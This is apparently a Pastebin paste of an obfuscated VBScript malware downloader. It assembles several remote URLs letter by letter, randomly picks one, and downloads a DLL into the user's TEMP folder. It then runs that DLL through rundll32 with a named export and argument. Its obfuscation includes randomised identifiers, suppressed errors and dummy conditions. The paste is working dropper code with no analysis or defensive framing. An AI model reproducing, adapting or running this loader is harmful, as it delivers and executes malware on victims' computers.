Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- On Error Resume Next
- Const BQb = 1, Ue = 2, Kn = 8
- Const UEs = 1, WLv9 = 2, GEw9 = "437", KYp = 2
- Function SDu6(BVt)
- Dim Qx4, Xi, SAx1
- Set Qx4 = CreateObject("ADODB.Stream")
- Qx4.type = WLv9
- Qx4.Charset = GEw9
- Qx4.Open
- Qx4.LoadFromFile BVt
- SAx1 = Qx4.ReadText
- Qx4.Close
- SDu6 = ZBd(SAx1)
- End Function
- Sub VKq4(BVt, Pg0)
- Dim Qx4, SAx1
- Set Qx4 = CreateObject("ADODB.Stream")
- Qx4.type = WLv9
- Qx4.Charset = GEw9
- Qx4.Open
- SAx1 = ALs(Pg0)
- Qx4.WriteText SAx1
- Qx4.SaveToFile BVt, KYp
- Qx4.Close
- End Sub
- Function Cv3(NHa0)
- Dim SAx1, YLy5(0)
- If NHa0 <= 0 Then
- Err.Raise 50001, "", "asdfasdf", "", 0
- ElseIf NHa0 = 1 Then
- Cv3 = YLy5
- Else
- SAx1 = Space(NHa0-1)
- Cv3 = Split(SAx1, " ")
- End If
- End Function
- Function Cl3(url)
- Dim DRq9, Zb9, Xi, Ox9
- Dim Ir7, VMo(1)
- Set DRq9 = CreateObject("Scripting.FileSystemObject")
- VMo(0) = "WinHttp.WinHttpRequest.5.1"
- VMo(1) = "MSXML2.XMLHTTP"
- For Each Ir7 in VMo
- Err.Clear
- Set Zb9 = CreateObject(Ir7)
- If Err.Number = 0 Then
- Exit For
- End If
- Next
- Zb9.Open "GET", url, False
- Zb9.Send
- Xi = Cv3(LenB(Zb9.ResponseBody))
- For Ox9 = 1 To LenB(Zb9.ResponseBody)
- Xi(Ox9-1) = AscB(MidB(Zb9.ResponseBody, Ox9, 1))
- Next
- Cl3 = Xi
- End Function
- Sub DQs( It, OJm )
- Dim Ox9, Yp1, DRq9, Zb9, Ah9
- Set DRq9 = CreateObject( "Scripting.FileSystemObject" )
- If DRq9.FolderExists( OJm ) Then
- Ah9 = DRq9.BuildPath( OJm, Mid( It, InStrRev( It, "/" ) + 1 ) )
- ElseIf DRq9.FolderExists( Left( OJm, InStrRev( OJm, "\" ) - 1 ) ) Then
- Ah9 = OJm
- Else
- WScript.Echo "ERROR: Target folder not found."
- Exit Sub
- End If
- Set Yp1 = DRq9.OpenTextFile( Ah9, Ue, True )
- Set Zb9 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
- Zb9.Open "GET", It, False
- Zb9.Send
- For Ox9 = 1 To LenB( Zb9.ResponseBody )
- Yp1.Write Chr( AscB( MidB( Zb9.ResponseBody, Ox9, 1 ) ) )
- Next
- Yp1.Close( )
- End Sub
- Function FSn7()
- Dim Lw6, Sz, ROm
- Set Lw6 = CreateObject("WScript.Shell")
- Set Sz = Lw6.Environment("System")
- ROm = Sz("PROCESSOR_ARCHITECTURE")
- If LCase(ROm) = "amd64" Then
- FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
- Else
- FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
- End If
- End Function
- Sub Ab(Bx0, Jn0, QRs5)
- Dim Lw6, DRq9, Yp1, Sd, Ib1
- Set Lw6 = CreateObject("WScript.Shell")
- Set DRq9 = CreateObject("Scripting.FileSystemObject")
- Set Yp1 = DRq9.GetFile(Bx0)
- Sd = Yp1.ShortPath
- Ib1 = FSn7() + " " + Sd + "," + Jn0 + " " + QRs5
- If 2 > 1 Then
- Lw6.Run(Ib1)
- End If
- End Sub
- Function NMa6(Bx0)
- Dim DRq9
- Set DRq9 = CreateObject("Scripting.FileSystemObject")
- NMa6 = DRq9.FileExists(Bx0)
- End Function
- Function SWu0(Bx0)
- Dim DRq9, Yp1
- Set DRq9 = CreateObject("Scripting.FileSystemObject")
- Set Yp1 = DRq9.GetFile(Bx0)
- SWu0 = Yp1.ShortPath
- End Function
- Function TEv5(CTi, Nh0)
- Dim NHa0
- NHa0 = CDbl(Int(CDbl(CTi)/CDbl(Nh0)))
- TEv5 = CDbl(CTi) - NHa0 * CDbl(Nh0)
- End Function
- Function Ng(LCl0, SAx1)
- SAx1(1) = 172 * SAx1(1) Mod 30307
- SAx1(0) = 171 * SAx1(0) Mod 30269
- SAx1(2) = 170 * SAx1(2) Mod 30323
- Dim Lp3
- Lp3 = TEv5((CDbl(SAx1(0))/30269.0 + CDbl(SAx1(1))/30307.0 + CDbl(SAx1(2))/30323.0), 1.0)
- Ng = Int(Lp3 * CDbl(LCl0))
- End Function
- Function Yg0(KFe)
- Yg0 = CInt(KFe*Rnd())
- End Function
- Sub Jo(LQh)
- WScript.Sleep(LQh)
- End Sub
- Randomize
- Dim Je(2), AMb, BJy(4), BVt
- Je(0) = 1256
- Je(1) = 21487
- Je(2) = 14252
- AMb = 21
- If 1=1 Then
- BJy(0) = "http://" & "t" & "a" & "s" & "t" & "e" & "b" & "u" & "d" & "s" & "m" & "a" & "r" & "k" & "e" & "t" & "i" & "n" & "g" & "." & "c" & "o" & "m" & "/" & "u" & "w" & "6" & "l" & "i" & "n"
- End If
- If 1=1 Then
- BJy(1) = "http://" & "m" & "e" & "c" & "h" & "a" & "p" & "." & "c" & "o" & "m" & "/" & "x" & "d" & "7" & "u" & "h"
- End If
- If 1=1 Then
- BJy(2) = "http://" & "c" & "o" & "f" & "f" & "e" & "e" & "t" & "e" & "a" & "s" & "h" & "o" & "p" & "." & "r" & "u" & "/" & "d" & "a" & "z" & "2" & "r" & "p"
- End If
- If 1=1 Then
- BJy(3) = "http://" & "f" & "i" & "c" & "u" & "s" & "s" & "a" & "l" & "m" & "." & "c" & "o" & "m" & "/" & "0" & "b" & "q" & "z" & "c" & "n" & "9" & "6"
- End If
- If 1=1 Then
- BJy(4) = "http://" & "w" & "a" & "y" & "n" & "e" & "s" & "i" & "n" & "e" & "w" & "." & "c" & "o" & "m" & "/" & "0" & "f" & "q" & "t" & "9" & "h" & "e" & "1"
- End If
- BVt = "Tqg8ceGBV4iU4AM2"
- Dim Lw6, Nj, Zj, Sg5, LQh
- Set objShell = CreateObject("WS"&"cript.Shell")
- Nj = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
- Dim ODc, FOl8, JPf0, Wn9, Ox9
- FOl8 = False
- For Ox9=0 To 10: Do
- Zj = Nj + "\" + BVt + CStr(Ox9) + ".dll"
- If NMa6(Zj) Then
- Sg5 = SWu0(Zj) & ".txt"
- If NMa6(Sg5) Then
- WScript.Quit(0)
- End If
- End If
- If Not FOl8 Then
- ODc = Yg0(UBound(BJy))
- DQs BJy(ODc), Zj
- If Err.Number <> 0 Then
- Exit Do
- End If
- FOl8 = True
- End If
- Ab Zj, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
- LQh = 24700
- Jo LQh
- Loop While False: Next
- If 3=3 Then
- WScript.Quit(1)
- End If
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement